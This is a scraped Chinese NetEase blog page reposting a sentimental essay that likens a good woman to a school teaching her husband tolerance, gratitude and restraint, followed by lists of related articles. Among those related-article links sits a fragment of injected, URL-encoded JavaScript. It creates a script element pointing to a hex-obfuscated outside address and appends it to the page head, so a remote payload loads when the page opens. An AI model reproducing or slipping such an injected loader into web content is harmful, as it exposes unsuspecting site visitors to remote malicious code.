注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

梦竹

一节复一节,千枝攒万叶。我自不开花,免撩蜂与蝶。

 
 
 

日志

 
 

【引用】好女人是一所学校  

2011-01-20 22:19:40|  分类: 女性文苑 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
本文转载自闲庭信步《好女人是一所学校》

 
原文地址:好女人是一所学校    原文作者:闲庭信步
 

 

 

好女人是一所学校

 

        一个好男人通过一个好女人走向世界,一个男人的一百个好朋友,也没有一个好女人好,一个男人的一百个好友也不能代替一个好女人。好女人是一种教育,好女人身上散发着一种清丽的春风化雨般的妙不可言的气息,她是好男人寻找自己,走向自己,然后豪迈地走向人生的百折不挠的力量。

好女人是一所学校,教你学会理解和宽容。在她体贴的目光里,你总会忘记烦恼和疲惫,放松紧张的身心,重新鼓起勇气,开始新一轮打拼。

   好女人是一所学校,教你懂得自律和谨慎。古语言:妻贤夫祸少,她温婉的劝说和及时的提醒,往往会给你冲动的头脑吹来一缕清新的风,让你重新审视已经做出的冒险的决定。

 好女人是一所学校,教你懂得珍惜和感恩。她也许不是个出众的美人儿,但肯定有温柔的眼神。在她柔弱的外表下,珍藏着一颗坚强的心。当你遇到困难的时候,她总能坚定的和你共度难关,当你终于出人头地的时候,提示你不要忘记曾经帮助过你的人。一起走过的路告诉你,她总是你最后的退路,是你最坚强的后盾!

 好女人是一所学校,教你拥有友谊和亲情。在你的朋友面前,她绝对不会让你难堪,即使你有什么错误,她多半会巧妙弥补、背后提醒,让你在人前能够扬眉吐气,博得广泛信任。她会心甘情愿的帮助你打理好家中的一切,让你没有后顾之忧,得享天伦。

  好女人是一所学校,但她也需要你的理解和珍惜。但愿你不要逃课,做一个合格的学生……

  一个好的学校,也要有好的学生相配。不是每个男人都有幸上一所好学校的。

 

 

点击这里查看其他文章

点击这里回到博客首页

 

    

 

 

 更多文章等您点击欣赏

                    一个傻男人的日记                            原来天使也会累                               你是37度女人吗?    

                    什么才是“女人味儿”                     给你的惊喜-  请点一下哦               女性心中的好男人,你做得到吗

                    绝不能触碰的男人6大禁区               做你的蓝颜知己,好吗?                  哥哥,我想做你的新娘

好女人是一所学校 - 闲庭信步 - 闲庭信步休闲吧cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A"<tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<                    蝴蝶飞不过沧海                               其实很多男孩都不知道                     好女人是一所学校

                    有一种情感 只能用心去储藏            人世间的十种美丽                            女人的韵味与男人的品位 

                    值得深交的女性和男性                     红尘有你                                          爱情之哲人哲语 

                    婚姻中妻子最糟糕的五种行为           品味牵挂                                          一生的朋友

                    星语心愿                                          爱,跳动在26个字符上                     生命中的最美

                    美丽的相遇                                      思念的梵音                                       问情

                    假如有一天,你找不到我了             隔着遥远的距离                                 老公房里传来的呻吟声

 

 

好女人是一所学校 - 闲庭信步 - 闲庭信步休闲吧

 

 

       

  评论这张
 
阅读(82)| 评论(19)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017